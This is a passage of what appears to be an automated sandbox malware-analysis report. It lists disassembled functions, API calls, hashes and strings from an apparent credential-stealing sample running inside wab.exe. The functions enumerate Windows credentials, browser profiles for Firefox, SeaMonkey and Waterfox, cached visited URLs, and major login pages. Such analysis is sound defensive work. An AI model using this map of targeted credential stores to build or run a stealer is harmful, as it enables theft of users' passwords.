                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                                                  • memcpy.MSVCRT ref: 0040BD2B
                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 509814883-3916222277
                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile$??3@ErrorLast
                                                                                  • String ID: |A
                                                                                  • API String ID: 1407640353-1717621600
                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                  • String ID: r!A
                                                                                  • API String ID: 2791114272-628097481
                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                  • API String ID: 62308376-4196376884
                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                  • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                  • memcpy.MSVCRT ref: 0040BEB2
                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                  • String ID:
                                                                                  • API String ID: 3191383707-0
                                                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                  • API String ID: 3527940856-11920434
                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                  • API String ID: 3527940856-2068335096
                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                  • memset.MSVCRT ref: 00404020
                                                                                  • memset.MSVCRT ref: 00404035
                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                  • API String ID: 3527940856-3369679110
                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                  • API String ID: 3510742995-2641926074
                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                  • memcpy.MSVCRT ref: 004033D0
                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                  • String ID: $0.@
                                                                                  • API String ID: 3030842498-1896041820
                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 2941347001-0
                                                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                  • API String ID: 3249829328-1174173950
                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 669240632-0
                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                  • String ID: "%s"
                                                                                  • API String ID: 1343145685-3297466227
                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                  • API String ID: 1714573020-3385500049
                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                  • memset.MSVCRT ref: 00408828
                                                                                  • memset.MSVCRT ref: 00408840
                                                                                  • memset.MSVCRT ref: 00408858
                                                                                  • memset.MSVCRT ref: 00408870
                                                                                  • memset.MSVCRT ref: 00408888
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
